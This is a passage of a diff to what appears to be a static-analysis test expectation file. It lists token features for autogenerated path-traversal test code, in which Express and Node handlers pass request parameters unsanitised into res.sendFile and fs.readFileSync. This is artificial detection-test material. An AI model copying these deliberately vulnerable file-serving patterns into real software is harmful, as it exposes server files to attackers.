autogenerated/TaintedPath/tainted-sendFile.js:25:38:25:43 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:38:25:43 | params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:38:25:43 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:38:25:43 | params | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:45:25:45 | x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:45:25:45 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:45:25:45 | x | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:45:25:45 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:45:25:45 | x | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:14 | res.sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:14 | res.sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:14 | res.sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:14 | res.sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:14 | res.sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | exceptional return of res.sen ... ams.x)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | exceptional return of res.sen ... ams.x)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | exceptional return of res.sen ... ams.x)) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | exceptional return of res.sen ... ams.x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | exceptional return of res.sen ... ams.x)) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | res.sen ... ams.x)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | res.sen ... ams.x)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | res.sen ... ams.x)) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | res.sen ... ams.x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:3:27:57 | res.sen ... ams.x)) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:7:27:14 | sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:7:27:14 | sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:7:27:14 | sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:7:27:14 | sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:7:27:14 | sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:22 | homeDir | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:22 | homeDir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:22 | homeDir | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:22 | homeDir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:22 | homeDir | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:22 | homeDir | stringConcatenatedWith | -endpoint- path.join() | | autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:56 | homeDir ... rams.x) | CalleeFlexibleAccessPath | res.sendFile | | autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:56 | homeDir ... rams.x) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:56 | homeDir ... rams.x) | contextFunctionInterfaces | | @@ -11161,6 +86619,32 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:56 | homeDir ... rams.x) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:56 | homeDir ... rams.x) | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:56 | homeDir ... rams.x) | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:29 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:29 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:29 | path | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:29 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:29 | path | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:34 | path.join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:34 | path.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:34 | path.join | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:34 | path.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:34 | path.join | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | exceptional return of path.jo ... rams.x) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | exceptional return of path.jo ... rams.x) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | exceptional return of path.jo ... rams.x) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | exceptional return of path.jo ... rams.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | exceptional return of path.jo ... rams.x) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | path.jo ... rams.x) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | path.jo ... rams.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | path.jo ... rams.x) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | path.jo ... rams.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | path.jo ... rams.x) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:26:27:56 | path.jo ... rams.x) | stringConcatenatedWith | homeDir -endpoint- | +| autogenerated/TaintedPath/tainted-sendFile.js:27:31:27:34 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:31:27:34 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:31:27:34 | join | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:31:27:34 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:31:27:34 | join | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:27:36:27:41 | 'data' | CalleeFlexibleAccessPath | path.join | | autogenerated/TaintedPath/tainted-sendFile.js:27:36:27:41 | 'data' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:27:36:27:41 | 'data' | calleeImports | path | @@ -11170,6 +86654,16 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:27:36:27:41 | 'data' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:27:36:27:41 | 'data' | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:27:36:27:41 | 'data' | receiverName | path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:46 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:46 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:46 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:46 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:46 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:53 | req.params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:53 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:53 | req.params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:53 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:53 | req.params | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:55 | req.params.x | CalleeFlexibleAccessPath | path.join | | autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:55 | req.params.x | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:55 | req.params.x | calleeImports | path | @@ -11179,24 +86673,151 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:55 | req.params.x | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:55 | req.params.x | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:27:44:27:55 | req.params.x | receiverName | path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:48:27:53 | params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:48:27:53 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:48:27:53 | params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:48:27:53 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:48:27:53 | params | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:27:55:27:55 | x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:27:55:27:55 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:27:55:27:55 | x | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:27:55:27:55 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:27:55:27:55 | x | fileImports | express path | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:0 | this | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:1 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:1 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:1 | require | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:1 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:1:1:1 | url | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:6 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:6 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:22 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:22 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:22 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:22 | fs = require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:22 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:5:1:22 | fs = require('fs') | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:1:10:1:16 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:10:1:16 | require | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:1:10:1:22 | exceptional return of require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:10:1:22 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:10:1:22 | exceptional return of require('fs') | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:1:10:1:22 | require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:10:1:22 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:1:10:1:22 | require('fs') | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:1:18:1:21 | 'fs' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-string-steps.js:1:18:1:21 | 'fs' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:1:18:1:21 | 'fs' | calleeImports | | | autogenerated/TaintedPath/tainted-string-steps.js:1:18:1:21 | 'fs' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-string-steps.js:1:18:1:21 | 'fs' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-string-steps.js:1:18:1:21 | 'fs' | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:2:5:2:8 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:5:2:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:5:2:8 | http | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:2:5:2:26 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:5:2:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:5:2:26 | http | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:2:5:2:26 | http = ... 'http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:5:2:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:5:2:26 | http = ... 'http') | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:2:12:2:18 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:12:2:18 | require | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:2:12:2:26 | exceptional return of require('http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:12:2:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:12:2:26 | exceptional return of require('http') | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:2:12:2:26 | require('http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:12:2:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:2:12:2:26 | require('http') | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:2:20:2:25 | 'http' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-string-steps.js:2:20:2:25 | 'http' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:2:20:2:25 | 'http' | calleeImports | | | autogenerated/TaintedPath/tainted-string-steps.js:2:20:2:25 | 'http' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-string-steps.js:2:20:2:25 | 'http' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-string-steps.js:2:20:2:25 | 'http' | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:7 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:7 | url | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:24 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:24 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:24 | url | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:24 | url = require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:24 | url = require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:5:3:24 | url = require('url') | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:3:11:3:17 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:11:3:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:11:3:17 | require | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:3:11:3:24 | exceptional return of require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:11:3:24 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:11:3:24 | exceptional return of require('url') | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:3:11:3:24 | require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:11:3:24 | require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:3:11:3:24 | require('url') | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:3:19:3:23 | 'url' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-string-steps.js:3:19:3:23 | 'url' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:3:19:3:23 | 'url' | calleeImports | | | autogenerated/TaintedPath/tainted-string-steps.js:3:19:3:23 | 'url' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-string-steps.js:3:19:3:23 | 'url' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-string-steps.js:3:19:3:23 | 'url' | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:5:5:10 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:5:5:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:5:5:10 | server | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:5:29:2 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:5:29:2 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:5:29:2 | server | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:5:29:2 | server ... NCY]\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:5:29:2 | server ... NCY]\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:5:29:2 | server ... NCY]\\n}) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:5:17 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:5:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:5:17 | http | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:5:30 | http.createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:5:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:5:30 | http.createServer | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:29:2 | exceptional return of http.cr ... NCY]\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:29:2 | exceptional return of http.cr ... NCY]\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:29:2 | exceptional return of http.cr ... NCY]\\n}) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:29:2 | http.cr ... NCY]\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:29:2 | http.cr ... NCY]\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:14:29:2 | http.cr ... NCY]\\n}) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:19:5:30 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:19:5:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:19:5:30 | createServer | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | this | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync 